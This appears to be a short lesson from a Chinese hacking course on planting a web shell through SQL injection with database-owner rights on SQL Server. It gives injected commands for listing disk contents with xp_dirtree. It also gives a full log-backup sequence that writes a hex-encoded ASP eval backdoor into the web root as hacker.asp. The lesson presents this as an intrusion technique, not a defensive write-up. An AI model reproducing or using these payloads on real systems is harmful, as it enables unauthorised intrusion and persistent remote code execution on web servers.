黑客防线vip入侵
第十讲：db权限下的备份获取webshell实例

学习目的
学会db权限的一些可用的扩展
学会db权限备份获取webshell
学会db权限查看磁盘文件

原理概述
Db权限下的列目录
Db权限下的log备份和差异备份

Db权限下的列目录
--得到硬盘文件信息             //dbo public --参数说明:目录名,目录深度,是否显示文件 //读取磁盘目录和文件 execute master..xp_dirtree 'c:' //列出所有c:\文件和目录,子目录 execute master..xp_dirtree 'c:',1 //只列c:\文件夹 execute master..xp_dirtree 'c:',1,1 //列c:\文件夹加文件 

Db权限下的备份
;alter database dweb set RECOVERY FULL-- ;create table cmd (a image)-- ;backup log dweb to disk = ‘c:\Sammy‘ with init-- ;insert into cmd (a) values (‘0x3C256576616C20726571756573742822612229253E‘)-- ;backup log dweb to disk = ‘d:\www\hacker.asp‘–
                                                                                                      
这里dweb是数据库名
Cmd是表名
<%eval request(“a”)%> = 0x3C256576616C20726571756573742822612229253E

我们直接用工具来做测试